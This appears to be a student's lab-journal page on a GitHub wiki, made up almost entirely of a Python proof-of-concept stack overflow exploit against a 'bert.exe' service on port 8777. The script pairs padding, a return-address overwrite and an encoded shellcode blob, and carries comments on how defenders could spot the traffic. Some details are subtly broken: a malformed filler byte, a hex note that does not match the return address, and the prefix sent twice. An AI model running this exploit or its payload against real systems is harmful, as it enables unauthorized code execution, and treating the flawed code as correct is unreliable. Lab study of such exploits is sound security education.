Buffer Overflow with Bert.exe - Henryisgreat/TechJournal GitHub Wiki
Open port on 8777 — probably bert.exe
#! /usr/bin/python2
# Proof-of-concept stack overflow sent to the service on TCP 8777 (the journal
# note above attributes that port to bert.exe). The packet is the classic
# layout: command prefix, a long run of padding, 4 bytes that land on the
# saved return address, a short sled, then an opaque binary payload.
#
# Defender's view: the observable shape on the wire is a short fixed command
# prefix followed by ~1.7 KB of a single repeated byte and then raw binary.
# That shape is what a length check on the receiving side (reject arguments
# longer than the buffer that holds them) and a network signature keyed on
# the prefix + long repeated-byte run would stop or flag.
import socket;
import sys;   # imported but never used in this script
ip="192.168.0.21"   # lab target, hard-coded
port = 8777 #default TRUN port
prefix = 'BERT /.:/'   # command string the service parses before the argument
offset = 'A' * 1744    # padding up to the location of the saved return address
eip = "\x3c\x15\x50\x43"   # 4 bytes written over the saved return address
sled = "\x090" * 32    # 32-repeat filler between the return address and the payload
buf = b""
# Opaque payload bytes. Nothing on this page states what they do or how they
# were generated, so treat them as an unknown binary blob; presumably position-
# independent code that runs once the return address is taken — confirm with a
# disassembler before drawing conclusions.
buf += b"\xb8\x7c\x21\xd2\xe7\xd9\xc0\xd9\x74\x24\xf4\x5f"
buf += b"\x29\xc9\xb1\x52\x31\x47\x12\x03\x47\x12\x83\x93"
buf += b"\xdd\x30\x12\x97\xf6\x37\xdd\x67\x07\x58\x57\x82"
buf += b"\x36\x58\x03\xc7\x69\x68\x47\x85\x85\x03\x05\x3d"
buf += b"\x1d\x61\x82\x32\x96\xcc\xf4\x7d\x27\x7c\xc4\x1c"
buf += b"\xab\x7f\x19\xfe\x92\x4f\x6c\xff\xd3\xb2\x9d\xad"
buf += b"\x8c\xb9\x30\x41\xb8\xf4\x88\xea\xf2\x19\x89\x0f"
buf += b"\x42\x1b\xb8\x9e\xd8\x42\x1a\x21\x0c\xff\x13\x39"
buf += b"\x51\x3a\xed\xb2\xa1\xb0\xec\x12\xf8\x39\x42\x5b"
buf += b"\x34\xc8\x9a\x9c\xf3\x33\xe9\xd4\x07\xc9\xea\x23"
buf += b"\x75\x15\x7e\xb7\xdd\xde\xd8\x13\xdf\x33\xbe\xd0"
buf += b"\xd3\xf8\xb4\xbe\xf7\xff\x19\xb5\x0c\x8b\x9f\x19"
buf += b"\x85\xcf\xbb\xbd\xcd\x94\xa2\xe4\xab\x7b\xda\xf6"
buf += b"\x13\x23\x7e\x7d\xb9\x30\xf3\xdc\xd6\xf5\x3e\xde"
buf += b"\x26\x92\x49\xad\x14\x3d\xe2\x39\x15\xb6\x2c\xbe"
buf += b"\x5a\xed\x89\x50\xa5\x0e\xea\x79\x62\x5a\xba\x11"
buf += b"\x43\xe3\x51\xe1\x6c\x36\xf5\xb1\xc2\xe9\xb6\x61"
buf += b"\xa3\x59\x5f\x6b\x2c\x85\x7f\x94\xe6\xae\xea\x6f"
buf += b"\x61\x11\x42\x6e\x64\xf9\x91\x70\xa4\xb0\x1c\x96"
buf += b"\xc2\x52\x49\x01\x7b\xca\xd0\xd9\x1a\x13\xcf\xa4"
buf += b"\x1d\x9f\xfc\x59\xd3\x68\x88\x49\x84\x98\xc7\x33"
buf += b"\x03\xa6\xfd\x5b\xcf\x35\x9a\x9b\x86\x25\x35\xcc"
buf += b"\xcf\x98\x4c\x98\xfd\x83\xe6\xbe\xff\x52\xc0\x7a"
buf += b"\x24\xa7\xcf\x83\xa9\x93\xeb\x93\x77\x1b\xb0\xc7"
buf += b"\x27\x4a\x6e\xb1\x81\x24\xc0\x6b\x58\x9a\x8a\xfb"
buf += b"\x1d\xd0\x0c\x7d\x22\x3d\xfb\x61\x93\xe8\xba\x9e"
buf += b"\x1c\x7d\x4b\xe7\x40\x1d\xb4\x32\xc1\x2d\xff\x1e"
buf += b"\x60\xa6\xa6\xcb\x30\xab\x58\x26\x76\xd2\xda\xc2"
buf += b"\x07\x21\xc2\xa7\x02\x6d\x44\x54\x7f\xfe\x21\x5a"
buf += b"\x2c\xff\x63"
#6250153C
# NOTE(review): the hex value above is the author's own note; it does not match
# the bytes assigned to `eip`, and its meaning is not explained on this page.
buffer = prefix + offset + eip + sled + buf   # full packet, in on-the-wire order
print("Fuzzing BERT with %s bytes " % len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((ip,port))   # return value is stored but never read
# One send, no response read, then close: the script does not observe whether
# the service survived, so a crash has to be confirmed on the target side.
s.send((prefix+buffer))
s.close()